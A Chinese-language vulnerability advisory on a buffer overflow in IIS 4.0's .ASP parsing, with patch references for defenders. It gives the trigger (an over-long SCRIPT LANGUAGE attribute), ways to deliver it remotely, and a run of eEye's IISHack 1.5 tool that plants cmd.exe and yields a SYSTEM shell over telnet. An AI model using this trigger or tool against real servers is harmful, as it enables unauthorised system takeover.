IIS .ASP文件缓冲区溢出漏洞

涉及程序:
ASP
  
描述:
IIS .ASP文件缓冲区溢出 漏洞
  
详细:
在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出 漏洞,利用该 漏洞将可以获得SYSTEM水平的访问权限。

该 漏洞是一个本地 漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。

在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGUAGE"变量,将导致IIS解析时inetinfo.exe产生溢出。下面是一个例子.asp文件:
...
<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">
</SCRIPT>
..
在[buffer中]包含2220个或者更多的字符,将导致溢出发生。这可能使攻击者获取SYSTEM级别的权限。

攻击者进行远程攻击可以通过下列方法:

*对于提供虚拟主机或者asp上传的站点。攻击者只需上传一个恶意的asp文件。就可以远程获取SYSTEM权限。
  
*某些留言板或者BBS程序允许用户输入Java Script脚本。攻击者就可以在留言中输入包含恶意代码的Java Script语句,远程入侵系统。
  
*利用IIS unicode 漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并发动溢出攻击。


以下代码仅仅用来测试和研究这个 漏洞,如果您将其用于不正当的途径请后果自负


C:/we are still hiring good programmers> iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:/send resume to [email protected]> iishack1.5.exe www.[yourowncompany].com 80
6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:/Inetpub/scripts]
Moving cmd.exe from winnt/system32 to C:/Inetpub/scripts.
Successfully moved cmd.exe to C:/Inetpub/scripts/eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.
C:/> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:/WINNT/system32>whoami
NT AUTHORITY/SYSTEM

受影响的系统:
Microsoft IIS 4.0 sp6
  - Microsoft Windows NT 4.0

不受影响系统:
Microsoft IIS 5.0
  - Microsoft Windows 2000 
  
解决方案:
微软已经在一些hot fixes中修复了该缓冲区溢出 漏洞,安装下列hot fix都可以修复此 漏洞:
MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability
MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability
MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability

你可能感兴趣的:(IIS .ASP文件缓冲区溢出漏洞)